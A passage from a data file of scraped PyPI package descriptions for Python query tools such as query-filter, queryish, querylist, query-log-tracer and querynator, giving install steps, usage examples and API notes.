can define a carto connection instead of a SQL DSN. If you want to do so, use acarto:entry in your database.Example:databases:\n test_carto:\n carto:\n user: my_carto_user\n api_key: my_carto_api_key\n\nmetrics:\n observations_simple_count:\n type: gauge\n description: Simple count to check if this works...\n\nqueries:\n query_count_simple_count:\n interval: 120s\n databases: [test_carto]\n metrics: [observations_simple_count]\n sql: SELECT count(*) from county_population;You cannot use bothdsnandcartoentries in the same database as that makes no sense.The available fields for the configuration object are the same as for the Longitude CartoDataSource objects.As of today, such fields are (keep in mind that some might not make sense for monitoring):api_version:v2by defaultuses_batch:Falseby defaulton_premise_domain:''by default. If provided, the Carto URL will use it. If not, the default user URL will.api_key:''by default. Mandatory. Master api key recommended.user:''by default. Mandatory. CARTO user (not email)cache: Empty by default. Cache configuration. 
Useless in this context for now.Development environmentThe easiest way to install the required dependencies is to create a virtual environment and install the package:python setup.py install\npipenv install -e ."} +{"package": "query-factory", "pacakge-description": "QUERY FACTORYThis tool should help organizing SQL queries into python projects.USAGEYou should seperate query template in a yaml file as in the following example:# template.yamldescription:|This is a simple query for demonstration purpose.variables:start_date:description:UTC datetime string to gather data from (inclusive)required:trueend_date:description:UTC datetime string to gather data to (exclusive)required:truecategory_id:description:Category id to filter on. If null, filter won't apply.required:falsedefault:nullmarket:description:Market scope (either 'pro' or 'part').required:falsedefault:partquery_template:|SELECT *FROM db.tableWHERE event_date >= {{ start_date }}AND event_date < {{ end_date }}AND market = {{ market }}{% if category_id %}AND category_id = {{ category_id }}{% endif %}LIMIT = 100;Then get your factory up and run some queries:fromquery_factoryimportSQLQueryFactory# factory setup.factory=SQLQueryFactory(\"/path/to/template.yaml\")Factory carries some information about template as:>>>set(factory.required_variables){'end_date','start_date'}>>>set(factory.optional_variables){'category_id'}>>>factory.describe(\"start_date\")'UTC datetime string to gather data from (inclusive)'Here is how you can variabilize your queries using a factory as define above:importpandasaspdconnection=connect_to_sql_query_engine()data_2020_02_01=pd.read_sql(factory(start_date=\"2020-02-01\",end_date=\"2020-02-02\"),con=connection)data_2020_02_02_filtered_on_categ1=pd.read_sql(factory(start_date=\"2020-02-02\",end_date=\"2020-02-03\",category_id=\"categ_1\"),con=connection)"} +{"package": "queryfilter", "pacakge-description": "FeatureAllow same query interface to be shared between Django ORM, SQLAlchemy, and GraphQL backend.Documenthttps://github.com/iCHEF/queryfilter/wikiInstallationpip install queryfilterDevelopmentgit clone https://github.com/iCHEF/queryfilter.git\ncd queryfilter\npip install -e .[dev]TestsThis project usespytestto run tests."} +{"package": "query-filter", "pacakge-description": "python-query-filterThis package provides a function-based API for filtering collections of\nheterogeneous, nested dictionaries or complex objects. 
It has 100% test\ncoverage.At the core of the API is theq_filterfunction, which is like\nthe built-infilterfunction, but take any number of predicate functions\nrather than just one.The remainder of the functions in this package\nare used to construct predicates that evaluate items\nor attributes within filtered objects.Inspired by the more class-basedQueryableList.Use CaseThis package is best suited to nested, heterogeneous data that\none might find in a serialised HTTP response body.Installpipinstallquery-filterExamplesFiltering by list/dictionary itemsIn the next few examples, we'll be filtering a typical response fromboto3,\nthe python client for Amazon Web Services.If we want to get data that haveAssociatePublicIpAddressset toTrue, we can do the following:>>>fromquery_filterimportq_filter,q>>>results=q_filter(versions_data[\"LaunchTemplateVersions\"],q[\"LaunchTemplateData\"][\"NetworkInterfaces\"][0][\"AssociatePublicIpAddress\"])>>>results>>>list(results)[{'CreateTime':datetime.datetime(2017,11,20,12,52,33),'DefaultVersion':True,'LaunchTemplateData':{'ImageId':'ami-aabbcc11','KeyName':'kp-us-east','NetworkInterfaces':[{'AssociatePublicIpAddress':True,'DeleteOnTermination':False,'DeviceIndex':0,'Groups':['sg-7c227019'],'SubnetId':'subnet-7b16de0c','PrivateIpAddress':'80.141.44.12'}],'UserData':''},'CreditSpecification':{'CpuCredits':'standard'},'CpuOptions':{'CoreCount':1,'ThreadsPerCore':2},'LaunchTemplateId':'lt-068f72b72934aff71','VersionNumber':1}]The filter above doesn't use== Truebut rather checks\nthe truthiness of the\"AssociatePublicIpAddress\"key's value.The equivalent generator expression for a simple query likes this\nis less readable.>>>fromtypingimportCollection>>>results=(versionforversioninversions_data[\"LaunchTemplateVersions\"]ifversion.get(\"LaunchTemplateData\",{}).get(\"NetworkInterfaces\")andisinstance(version[\"LaunchTemplateData\"][\"NetworkInterfaces\"],Collection)andversion[\"LaunchTemplateData\"][\"NetworkInterfaces\"][0].get(\"AssociatePublicIpAddress\"))This example is excessively defensive, but hopefully it explains the motivation\nbehind this tool.Agetcall is needed in the generator expression above because the item\"AssociatePublicIpAddress\"is sometimes missing.\nThe first two conditions aren't strictly needed to filter the example data.\nHowever, they do illustrate the fact thatq_itempredicates silently\nreturnFalseif\"LaunchTemplateData\"is not present, or\nif\"NetworkInterfaces\"is missing, is not a collection\nor is an empty collection.Filtering using custom predicatesWe can combine custom queries with those created with the help\nof this package. 
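Before returning to the launch-template data, here is a minimal warm-up sketch. The records and the is_active helper below are invented for illustration (they are not part of the boto3 response above); the point is simply that any plain callable which accepts an object and returns a boolean can be passed to q_filter alongside predicates built with q.

```python
from query_filter import q_filter, q

# Invented example records, not taken from the boto3 response used elsewhere.
servers = [
    {"name": "web-1", "cpu": {"cores": 2}, "active": True},
    {"name": "web-2", "cpu": {"cores": 8}, "active": False},
    {"name": "db-1", "cpu": {"cores": 8}, "active": True},
]

def is_active(record: dict) -> bool:
    # A plain callable works as a predicate next to the q helpers.
    return record.get("active", False)

# All predicates must hold (q_filter is an alias for q_filter_all).
results = list(q_filter(servers, q["cpu"]["cores"] >= 4, is_active))
print(results)  # [{'name': 'db-1', 'cpu': {'cores': 8}, 'active': True}]
```

The same pattern scales to the richer launch-template example that follows.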
The following predicate can be used to ensure\nthat the launch template versions specify a sufficient number of\nthreads.defthreads_gte(min_threads:int):defpred(version:dict):cores=version[\"CpuOptions\"][\"CoreCount\"]threads=version[\"CpuOptions\"][\"ThreadsPerCore\"]returncores*threads>=min_threadsreturnpredHere we're usingq_any, which combines the predicates passed into it,\nreturningTrueif at least one of them is satisfied.>>>fromquery_filterimportq,q_any,q_filter>>>results=q_filter(versions_data[\"LaunchTemplateVersions\"],q_any(threads_gte(5),q[\"CreditSpecification\"][\"CpuCredits\"]==\"unlimited\"))>>>list(results)[{'CreateTime':datetime.datetime(2017,11,20,15,45,33),'DefaultVersion':False,'LaunchTemplateData':{'ImageId':'ami-cc3e8abf','KeyName':'kp-us-east','NetworkInterfaces':[{'DeviceIndex':0,'Groups':['sg-7c227019'],'SubnetId':'subnet-a4579fe6','Ipv6Addresses':[{'Ipv6Address':'4f08:ea60:17f9:3e89:4d66:2e8c:259c:d1a9'},{'Ipv6Address':'b635:26ad:8fdf:a274:88dc:cf8c:47df:26b7'},{'Ipv6Address':'eb7a:5a31:f899:dd8c:e566:3307:a45e:dcf6'}],'Ipv6AddressCount':3,'PrivateIpAddress':'80.141.152.14'}]},'CpuOptions':{'CoreCount':4,'ThreadsPerCore':1},'CreditSpecification':{'CpuCredits':'unlimited'},'LaunchTemplateId':'lt-aaa68831cce2a8d91','VersionNumber':4},{'CreateTime':datetime.datetime(2017,11,20,19,4,54),'DefaultVersion':False,'LaunchTemplateData':{'ImageId':'ami-2f7ac02a','KeyName':'kp-us-east','NetworkInterfaces':[{'DeviceIndex':0,'Groups':['sg-1c628b25'],'SubnetId':'subnet-a4579fe6','Ipv6Addresses':[{'Ipv6Address':'f486:915c:2be9:b0da:7d60:3fae:d65a:e8d8'},{'Ipv6Address':'eb7a:5a31:f899:dd8c:e566:3307:a45e:dcf6'}],'Ipv6AddressCount':2,'PrivateIpAddress':'80.141.152.136'}]},'CpuOptions':{'CoreCount':3,'ThreadsPerCore':2},'CreditSpecification':{'CpuCredits':'standard'},'LaunchTemplateId':'lt-aaa68831cce2a8d91','VersionNumber':5}]Filtering by object attributesThis can be useful if you're working with objects that have a lot\nof \"has-a\" relationships to other objects. 
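Before the fuller ancestor-chart example below, a minimal sketch shows the attribute syntax; the Car and Engine dataclasses here are invented for illustration, and any object that supports dot lookups would work the same way.

```python
from dataclasses import dataclass

from query_filter import q_filter, q

# Invented toy objects with a "has-a" relationship (a Car has an Engine).
@dataclass
class Engine:
    horsepower: int

@dataclass
class Car:
    name: str
    engine: Engine

cars = [Car("hatchback", Engine(90)), Car("roadster", Engine(240))]

# q.engine.horsepower builds a predicate over the nested attribute chain.
fast = list(q_filter(cars, q.engine.horsepower > 150))
print(fast)  # [Car(name='roadster', engine=Engine(horsepower=240))]
```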
For brevity,\na hacky binary tree-like class is used to build a fictional ancestor chart.>>>classNode:instances=[]def__init__(self,name,mother=None,father=None):self.name=nameself.mother=motherself.father=fatherself.instances.append(self)def__repr__(self):return(f\"Node('{self.name}', mother={repr(self.mother)}, \"f\"father={repr(self.father)})\")>>>Node(name='Tiya Meadows',mother=Node('Isobel Meadows (nee Walsh)',mother=Node(name='Laura Walsh (nee Stanton)',mother=Node('Opal Eastwood (nee Plant)'),father=Node('Alan Eastwood')),father=Node(name='Jimmy Walsh')),father=Node(name='Isaac Meadows',mother=Node('Halle Meadows (nee Perkins)'),father=Node('Wilbur Meadows')))To demonstrate the syntax, we can filter for the root node by their\ngreat-great-grandmother.>>>fromquery_filterimportq,q_contains,q_filter>>>results=q_filter(Node.instances,q_contains(q.mother.mother.mother.name,\"Opal Eastwood\"))>>>list(results)[Node('Tiya Meadows',mother=Node('Isobel Meadows (nee Walsh)',mother=Node('Laura Walsh (nee Stanton)',mother=Node('Opal Eastwood (nee Plant)',mother=None,father=None),father=Node('Alan Eastwood',mother=None,father=None)),father=Node('Jimmy Walsh',mother=None,father=None)),father=Node('Isaac Meadows',mother=Node('Halle Meadows (nee Perkins)',mother=None,father=None),father=Node('Wilbur Meadows',mother=None,father=None)))]q_containsabove is the equivalent of the expression:\"Opal Eastwood\" in Node.instances.mother.mother.mother.name.\nIt is one of several functions that enable us to create queries\nbased on operators that cannot be overloaded in the same way\nas the comparison operators.Here is another example:>>>fromquery_filterimportq,q_is_not,q_matches_regex,q_filter>>>results=q_filter(Node.instances,q_matches_regex(q.name,r\"Walsh(?! \\(nee)\"),q_is_not(q.father,None))>>>list(results)[Node('Isobel Meadows (nee Walsh)',mother=Node('Laura Walsh (nee Stanton)',mother=Node('Opal Eastwood (nee Plant)',mother=None,father=None),father=Node('Alan Eastwood',mother=None,father=None)),father=Node('Jimmy Walsh',mother=None,father=None))]APIFilter functionsquery_filter.q_filterThis is an alias forquery_filter.q_filter_all.query_filter.q_filter_all(objects: Iterable, *preds) -> Iterable[Any]Returns afilteriterator containing objects for which all of the predicates inpredsare true.query_filter.q_filter_any(objects: Iterable, *preds) -> Iterable[Any]Returns afilteriterator containing objects for which any of the predicates inpredsare true.query_filter.q_filter_not_any(objects: Iterable, *preds) -> Iterable[Any]Returns afilteriterator containing objects for which none of the predicates inpredsis true.Predicate functionsquery_filter.q_all(*preds: Callable) -> CallableReturns a predicate that returnsTrueif all predicates\ninpredsreturnTrue.query_filter.q_any(*preds: Callable) -> CallableReturns a predicate that returnsTrueif any predicates\ninpredsreturnTrue.query_filter.q_not(pred: Callable) -> CallableReturns a predicate that returnsTrueif the predicatepredreturnsFalse.Building QueriesTheQueryclass, an instance of which is always imported asqis used to specify attribute and item access.It provides a way of specifying lookups on objects. 
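One of the filter variants listed above, q_filter_not_any, is not exercised in the examples; here is a short sketch with invented ticket records showing how it keeps only the objects that match none of the given predicates, before turning to the Query lookup syntax in more detail.

```python
from query_filter import q_filter_not_any, q

# Invented records for illustration.
tickets = [
    {"id": 1, "status": "open", "priority": 3},
    {"id": 2, "status": "closed", "priority": 1},
    {"id": 3, "status": "open", "priority": 1},
]

# Keep tickets that are neither closed nor high priority:
# an object is kept only if *none* of the predicates is true for it.
remaining = list(q_filter_not_any(tickets, q["status"] == "closed", q["priority"] >= 3))
print(remaining)  # [{'id': 3, 'status': 'open', 'priority': 1}]
```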
For instance,\nthis would could be used to filter for orders created in May:>>>results=q_filter(orders,q.metadata['date_created'].month==5)The class supports some operators which offer the most convenient API\nfor building queries.Comparison OperatorsTheQueryclass supports all six comparison operators:<,<=,==,!=,>and>=.Bitwise OperatorsThe bitwise not operator~negates the truthiness of theQueryobject.For exampleq.is_activewill produce a predicate that returnsTrueif\nan object has an attributes namedis_activeand that attribute's value\nis truthy.~q.is_activewill produce the opposite result.FunctionsThere are some useful operators such asisthat cannot be overloaded.\nMost of the functions below replace these.query_filter.q_is_in(query: Query, container: Container) -> Callable[[Any], bool]Returns a predicate that's true if the queried object is in thecontainerargument.query_filter.q_contains(query: Query, member: Any) -> Callable[[Container], bool]Returns a predicate that's true if the queried object contains thememberargument.query_filter.q_is(query: Query, criterion: Any) -> Callable[[Any], bool]Returns a predicate that's true if the queried object is identical\nto the criterion object.query_filter.q_is_not(query, criterion: Any) -> Callable[[Any], bool]Returns a predicate that's true if the queried object is not identical\nto the criterion object.query_filter.q_matches_regex(query: Query, pattern: str | bytes) -> [[str | bytes], bool]This function may be convenient when working with strings and byte strings.\nIt returns a predicate that's true if the queried object matches the regular expressionpatternargument.TestsIf you want to run tests, you'll first need to install the package\nfrom source and make it editable. Ensuring that you're in the root directory\nof this repo, enter:pipinstall-e.\npipinstall-rrequirements/development.txt\npytestTo run tests with coverage:coveragerun--source\"query_filter\"-mpytesttests\ncoveragereportFeature ideasQuery all items in an iterable rather than just one using...Build queries out ofQueryobjects using the&and|operatorsMake silent failure when retrieving attributes and items optional"} +{"package": "query-flow", "pacakge-description": "QueryFlowQueryFlow, is a query visualization tool that provides insights into common problems in your SQL query.\nQueryFlow visualizes the query execution using the Sankey diagram, a technique that allows one to illustrate complex processes, with a focus on a single aspect or resource that you want to highlight.\nThis allow to tackle the following problems:Identifying missing records.Identifying Ineffective operations.Identifying duplications in a query.Comparing optimizer planned metrics to actual metrics.Identifying performance bottlenecks in a single query.Identifying performance bottlenecks in multiple queries.Currently QueryFlow support the following databases/data-engines:AthenaPostgreSQLDocumentation:https://eyaltrabelsi.github.io/query-flowGitHub:https://github.com/eyaltrabelsi/query-flowPyPI:https://pypi.org/project/query-flow/Free software: MITInstallingThe best way to install query-flow is:$ pip install query-flowIn case you want to use another way go to theinstallation page."} +{"package": "querygrid", "pacakge-description": "No description available on PyPI."} +{"package": "queryish", "pacakge-description": "queryishA Python library for constructing queries on arbitrary data sources following Django's QuerySet API.MotivationDjango's QuerySet API is a powerful tool for constructing queries on a database. 
It allows you to compose queries incrementally, with the query only being executed when the results are needed:books=Book.objects.all()python_books=books.filter(topic='python')latest_python_books=python_books.order_by('-publication_date')[:5]print(latest_python_books)# Query is executed hereThis pattern is a good fit for building web interfaces for listing data, as it allows filtering, ordering and pagination to be handled as separate steps.We may often be required to implement similar interfaces for data taken from sources other than a database, such as a REST API or a search engine. In these cases, we would like to have a similarly rich API for constructing queries to these data sources. Even better would be to follow the QuerySet API as closely as possible, so that we can take advantage of ready-made tools such asDjango's generic class-based viewsthat are designed to work with this API.queryishis a library for building wrappers around data sources that replicate the QuerySet API, allowing you to work with the data in the same way that you would with querysets and models.InstallationInstall using pip:pipinstallqueryishUsage - REST APIsqueryishprovides a base classqueryish.rest.APIModelfor wrapping REST APIs. By default, this follows the out-of-the-box structure served byDjango REST Framework, but various options are available to customise this.fromqueryish.restimportAPIModelclassParty(APIModel):classMeta:base_url=\"https://demozoo.org/api/v1/parties/\"fields=[\"id\",\"name\",\"start_date\",\"end_date\",\"location\",\"country_code\"]pagination_style=\"page-number\"page_size=100def__str__(self):returnself.nameThe resulting class has anobjectsproperty that supports the usual filtering, ordering and slicing operations familiar from Django's QuerySet API, although these may be limited by the capabilities of the REST API being accessed.>>>Party.objects.count()4623>>>Party.objects.filter(country_code=\"GB\")[:10],,,,,,,,,]>>>>Party.objects.get(name=\"Nova 2023\")Methods supported includeall,count,filter,order_by,get,first, andin_bulk. The result set can be sliced at arbitrary indices - these do not have to match the pagination supported by the underlying API.APIModelwill automatically make multiple API requests as required.The following attributes are available onAPIModel.Meta:base_url: The base URL of the API from where results can be fetched.pk_field_name: The name of the primary key field. Defaults to\"id\". Lookups on the field name\"pk\"will be mapped to this field.detail_url: A string template for the URL of a single object, such as\"https://demozoo.org/api/v1/parties/%s/\". If this is specified, lookups on the primary key and no other fields will be directed to this URL rather thanbase_url.fields: A list of field names defined in the API response that will be copied to attributes of the returned object.pagination_style: The style of pagination used by the API. Recognised values are\"page-number\"and\"offset-limit\"; all others (including the default ofNone) indicate no pagination.page_size: Required ifpagination_styleis\"page-number\"- the number of results per page returned by the API.page_query_param: The name of the URL query parameter used to specify the page number. Defaults to\"page\".offset_query_param: The name of the URL query parameter used to specify the offset. Defaults to\"offset\".limit_query_param: The name of the URL query parameter used to specify the limit. Defaults to\"limit\".ordering_query_param: The name of the URL query parameter used to specify the ordering. 
Defaults to\"ordering\".To accommodate APIs where the returned JSON does not map cleanly to the intended set of model attributes, the class methodsfrom_query_dataandfrom_individual_dataonAPIModelcan be overridden:classPokemon(APIModel):classMeta:base_url=\"https://pokeapi.co/api/v2/pokemon/\"detail_url=\"https://pokeapi.co/api/v2/pokemon/%s/\"fields=[\"id\",\"name\"]pagination_style=\"offset-limit\"verbose_name_plural=\"pokemon\"@classmethoddeffrom_query_data(cls,data):\"\"\"Given a record returned from the listing endpoint (base_url), return an instance of the model.\"\"\"# Records within the listing endpoint return a `url` field, from which we want to extract the IDreturncls(id=int(re.match(r'https://pokeapi.co/api/v2/pokemon/(\\d+)/',data['url']).group(1)),name=data['name'],)@classmethoddeffrom_individual_data(cls,data):\"\"\"Given a record returned from the detail endpoint (detail_url), return an instance of the model.\"\"\"returncls(id=data['id'],name=data['name'],)def__str__(self):returnself.nameCustomising the REST API queryset classTheobjectsattribute of anAPIModelsubclass is an instance ofqueryish.rest.APIQuerySetwhich initially consists of the complete set of records. As with Django's QuerySet, methods such asfilterreturn a new instance.It may be necessary to subclassAPIQuerySetand override methods in order to support certain API responses. For example, the base implementation expects unpaginated API endpoints to return a list as the top-level JSON object, and paginated API endpoints to return a dict with aresultsitem. If the API you are working with returns a different structure, you can override theget_results_from_responsemethod to extract the list of results from the response:fromqueryish.restimportAPIQuerySetclassTreeQuerySet(APIQuerySet):base_url=\"https://api.data.amsterdam.nl/v1/bomen/stamgegevens/\"pagination_style=\"page-number\"page_size=20http_headers={\"Accept\":\"application/hal+json\"}defget_results_from_response(self,response):returnresponse[\"_embedded\"][\"stamgegevens\"]APIQuerySetsubclasses can be instantiated independently of anAPIModel, but results will be returned as plain JSON values:>>>TreeQuerySet().filter(jaarVanAanleg=1986).first(){'_links':{'schema':'https://schemas.data.amsterdam.nl/datasets/bomen/dataset#stamgegevens','self':{'href':'https://api.data.amsterdam.nl/v1/bomen/stamgegevens/1101570/','title':'1101570','id':1101570},'gbdBuurt':{'href':'https://api.data.amsterdam.nl/v1/gebieden/buurten/03630980000211/','title':'03630980000211','identificatie':'03630980000211'}},'id':1101570,'gbdBuurtId':'03630980000211','geometrie':{'type':'Point','coordinates':[115162.72,485972.68]},'boomhoogteklasseActueel':'c. 9 tot 12 m.','jaarVanAanleg':1986,'soortnaam':\"Salix alba 'Chermesina'\",'stamdiameterklasse':'0,5 tot 1 m.','typeObject':'Gekandelaberde boom','typeSoortnaam':'Bomen','soortnaamKort':'Salix','soortnaamTop':'Wilg (Salix)'}This can be overridden by defining amodelattribute on the queryset, or overriding theget_instance/get_individual_instancemethods. To use a customised queryset with anAPIModel, define thebase_query_classattribute on the model class:classTree(APIModel):base_query_class=TreeQuerySetclassMeta:fields=[\"id\",\"geometrie\",\"boomhoogteklasseActueel\",\"jaarVanAanleg\",\"soortnaam\",\"soortnaamKort\"]# >>> Tree.objects.filter(jaarVanAanleg=1986).first()# Other data sourcesqueryishis not limited to REST APIs - the base classqueryish.Queryishcan be used to build a QuerySet-like API around any data source. 
At minimum, this requires defining arun_querymethod that returns an iterable of records that is filtered, ordered and sliced according to the queryset's attributes. For example, a queryset implementation that works from a simple in-memory list of objects might look like this:fromqueryishimportQueryishclassCountryQuerySet(Queryish):defrun_query(self):countries=[{\"code\":\"nl\",\"name\":\"Netherlands\"},{\"code\":\"de\",\"name\":\"Germany\"},{\"code\":\"fr\",\"name\":\"France\"},{\"code\":\"gb\",\"name\":\"United Kingdom\"},{\"code\":\"us\",\"name\":\"United States\"},]# Filter the list of countries by `self.filters` - a list of (key, value) tuplesfor(key,val)inself.filters:countries=[cforcincountriesifc[key]==val]# Sort the list of countries by `self.ordering` - a tuple of field namescountries.sort(key=lambdac:[c.get(field,None)forfieldinself.ordering])# Slice the list of countries by `self.offset` and `self.limit`. `offset` is always numeric# and defaults to 0 for an unsliced list; `limit` is either numeric or None (denoting no limit).returncountries[self.offset:self.offset+self.limitifself.limitelseNone]Subclasses will also typically override the methodrun_count, which returns the number of records in the queryset accounting for any filtering and slicing. If this is not overridden, the default implementation will callrun_queryand count the results."} +{"package": "querykit", "pacakge-description": "querykitA Wagtail app for handling queries. Please bear with us while we prepare more detailed documentation.Compatibilityquerykit' major.minor version number indicates the Wagtail release it is compatible with. Currently this is Wagtail 4.1.xInstallationInstall usingpip:pipinstallquerykitAddquerykitto yourINSTALLED_APPSsetting:INSTALLED_APPS=[# ...'querykit'# ...]"} +{"package": "querylib", "pacakge-description": "No description available on PyPI."} +{"package": "querylist", "pacakge-description": "# querylist[![Build Status](https://img.shields.io/travis/thomasw/querylist.svg)](https://travis-ci.org/thomasw/querylist)[![Coverage Status](https://img.shields.io/coveralls/thomasw/querylist.svg)](https://coveralls.io/r/thomasw/querylist)[![Latest Version](https://img.shields.io/pypi/v/querylist.svg)](https://pypi.python.org/pypi/querylist/)[![Downloads](https://img.shields.io/pypi/dm/querylist.svg)](https://pypi.python.org/pypi/querylist/)Sick of for loop + conditional soup when dealing with complicated lists?Querylist is here to help.This package provides a data structure called a QueryList, an extension ofPython's built in list data type that adds django ORM-eseque filtering,exclusion, and get methods. QueryLists allow developers to easily query andretrieve data from complex lists without the need for unnecessarily verboseiteration and selection cruft.The package also provides BetterDict, a backwards-compatible wrapper fordictionaries that enables dot lookups and assignment for key values.Take a look at the [completedocumentation](https://querylist.readthedocs.org/) for more information.## InstallationQuerylist can be installed like any other python package:> pip install querylistQuerylist is tested against Python 2.6, 2.7, 3.3, 3.4, and pypy.## Usage### BetterDictsBetterDicts wrap normal dicts. 
They have all of the same functionality onewould expect from a normal dict:>>> from querylist import BetterDict>>> src = {'foo': 'bar', 'items': True}>>> bd = BetterDict(src)>>> bd == srcTrue>>> bd['foo']'bar'>>> bd.items()[('items', True), ('foo', 'bar')]However, BetterDicts can also preform dot lookups and assignment of keyvalues!>>> bd.bar_time = True>>> bd.foo = 'meh'>>> bd.foo'meh'>>> bd.bar_timeTrue>>> bd['bar_time']TrueKey values that conflict with normal dict attributes are accessible via a`_bd_` attribute.>>> bd.items>>> bd._bd_.itemsTrue[More about BetterDicts >>](https://querylist.readthedocs.org/en/latest/betterdict.html)### QueryListsQueryLists work just like lists:>>> from querylist import QueryList>>> site_list = [{'url': 'http://site1.tld/','meta': {'keywords': ['Mustard', 'kittens'],'description': 'My cool site'},'published': True,'id': 1,'name': 'Site 1'}, {'url': 'http://site2.tld/','meta': {'keywords': ['Catsup', 'dogs'],'description': 'My cool site'},'published': True,'id': 2,'name': 'SitE 2'}, {'url': 'http://site3.tld/','meta': {'keywords': ['Mustard', 'kittens'],'description': 'My cool site'},'published': False,'id': 3,'name': 'Site 3'}]>>> ql = QueryList(site_list)>>> ql == site_listTrueThey also let developers, exclude objects that don't match criteria via fieldlookups or filter the QueryList to only the objects that do match a providedcriteria:>>> ql.exclude(published=True)[{'url': 'http://site3.tld/', 'meta': {'keywords': ['Mustard', 'kittens'], 'description': 'My cool site'}, 'id': 3, 'name': 'Site 3', 'published': False}]>>> ql.filter(published=True).exclude(meta__keywords__contains='Catsup')[{'url': 'http://site1.tld/', 'meta': {'keywords': ['Mustard', 'kittens'], 'description': 'My cool site'}, 'id': 1, 'name': 'Site 1', 'published': True}]And finally, they let developers retrieve specific objects with the getmethod:>>> ql.get(id=2){'url': 'http://site1.tld/', 'meta': {'keywords': ['Mustard', 'kittens'], 'description': 'My cool site'}, 'id': 2, 'name': 'Site 1', 'published': True}By default, QueryLists work exclusively with lists of dictionaries. This isachieved partly by converting the member dicts to BetterDicts oninstantiation. QueryLists also supports lists of any objects that support dotlookups. `QueryList.__init__()` has parameters that let users easily convertlists of dictionaries to custom objects. Consider the `site_list` exampleabove: instead of just letting the QueryList default to a BetterDict, we couldinstantiate it with a custom Site class that provides methods for publishing,unpublishing, and deleting sites. That would then allow us to write code likethe following, which publishes all unpublished sites:>>> from site_api import Site>>> ql = QueryList(site_list, wrap=Site)>>> [x.publish() for x in ql.exclude(published=True)][More about QueryLists >>](https://querylist.readthedocs.org/en/latest/querylist.html)## Contributing1. Fork the repo and then clone it locally.2. Install the development requirements: `pip install -r requirements.txt` (use `requirements26.txt` for python 2.6)3. Use [testtube](https://github.com/thomasw/testtube/)'s `stir` command(installed via #2) to monitor the project directory for changes andautomatically run the test suite.4. Make changes and submit a pull request.At the moment, Querylist has great test coverage. Please do your part to helpkeep it that way by writing tests whenever you add or change code.## Everything elseCopyright (c) [Thomas Welfley](http://welfley.me). 
See[LICENSE](https://github.com/thomasw/querylist/blob/master/LICENSE) fordetails."} +{"package": "querylm", "pacakge-description": "No description available on PyPI."} +{"package": "query-log", "pacakge-description": "No description available on PyPI."} +{"package": "query-log-tracer", "pacakge-description": "query-log-tracerA Python tool/library that traces a value in MySQL general logs.UsageSet up$ pip install query-log-tracerExample usage./tests/files/general-query.logis a sample query log file of MySQL 5.7. Most of the queries are generated by EC-CUBE 4.$ query-log-tracer --log-file=./tests/files/general-query.log --target-table=dtb_customer --target-column=point --filter-column=id --filter-value=1\n=== Searching in ./tests/files/general-query.log ===\n\n2020-02-02T07:19:51.127168Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:20:19.927027Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:20:26.901577Z dtb_customer.point (id = 1) is set: '100'\n2020-02-02T07:20:31.034901Z dtb_customer.point (id = 1) is set: '1000'\n2020-02-02T07:20:39.396236Z dtb_customer.point (id = 1) is set: '2000'\n2020-02-02T07:20:46.379143Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:26:37.443522Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:26:55.216881Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:27:13.008757Z dtb_customer.point (id = 1) is set: '50'\n2020-02-02T07:28:01.128957Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:28:09.995354Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:28:14.172518Z dtb_customer.point (id = 1) is set: '27'\n2020-02-02T07:33:41.745400Z dtb_customer.point (id = 1) changes: +500For EC-CUBE 2, try the following command.$ query-log-tracer --log-dir=your-directory --target-table=dtb_customer --target-column=point --filter-column=customer_id --filter-value=1"} +{"package": "querymagic", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "query-maker-ryazantseff", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "querymaster", "pacakge-description": "Query MasterQueryMaster is a Python package that enables the use of multiple databases in one place."} +{"package": "querynator", "pacakge-description": "Python package to query cancer variant databasesFree software: MIT licenseDocumentation:https://querynator.readthedocs.io.FeaturesCommand-line tool to query thecancergenomeinterpretervia its REST APICommand-line tool to query theClinical Interpretation of Variants in Cancer (CIViC) KnowledgebaseusingCIViCpyCreditsThis package uses the cancergenomeinterpreter.org REST API for data retrieval.Mui\u00f1os, F., Mart\u00ednez-Jim\u00e9nez, F., Pich, O. et al. In silico saturation mutagenesis of cancer genes. Nature 596, 428\u2013432 (2021).https://doi.org/10.1038/s41586-021-03771-1Tamborero, D. Rubio-Perez, C., Deu-Pons, J. et al., Cancer Genome Interpreter annotates the biological and clinical relevance of tumor alterations. Genome Medicine 10, (2018). doi:https://doi.org/10.1101/140475This package uses the CIViCpy package for data retrieval from the CIViC database.Wagner, Alex H., et al. \u201cCIViCpy: a python software development and analysis toolkit for the CIViC knowledgebase.\u201d JCO Clinical Cancer Informatics 4 (2020): 245-253. doi:https://doi.org/10.1200/CCI.19.00127Griffith, M., Spies, N., Krysiak, K. et al. 
CIViC is a community knowledgebase for expert crowdsourcing the clinical interpretation of variants in cancer. Nat Genet 49, 170\u2013174 (2017). doi:https://doi.org/10.1038/ng.3774This package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.Changelog0.4.1 - Stormy Saturn (2023-06-13)AddedFixedBug fixes to include all evidence of CIViCDependenciesDeprecated0.4.0 - Stormy Saturn (2023-05-31)AddedFixedFixed functionality for new CGI file structureFixed case when CIViC has no hitsDependenciesDeprecated0.3.3 - Iron Mercury (2023-05-05)AddedFixedFixed API docsDependenciesDeprecated0.3.2 - Iron Mercury (2023-05-05)AddedFixedFixed version bumpDependenciesDeprecated0.3.1 - Iron Mercury (2023-05-05)AddedFixedFixed import of site-packages in setup.pyDependenciesDeprecated0.3.0 - Iron Mercury (2023-05-04)AddedAdded functionality to combine the results of the Knowledgebases in an HTML reportAdded possibility to have non-numerical chromosome columns in the input vcfAdded deletion of CGI jobs from CGI Server after completionFixedDependenciesDeprecated0.2.2 - Sour Venus (2023-03-16)AddedOptional VEP annotation based filteringAdditional metadataUsage of pyVCF3 to read vcf filesQuerynator ID added for filtered vcf filesAll possible reference genomes for CIViCFixedDependenciesDeprecatedUsage of pysam to read vcf files0.2.1 - Sour Venus (2023-02-16)AddedFixedRendering API docsDependenciesDeprecated0.2.0 - Sour Venus (2023-02-07)AddedAdded functionality to query the Clinical Interpretation of Variants in Cancer 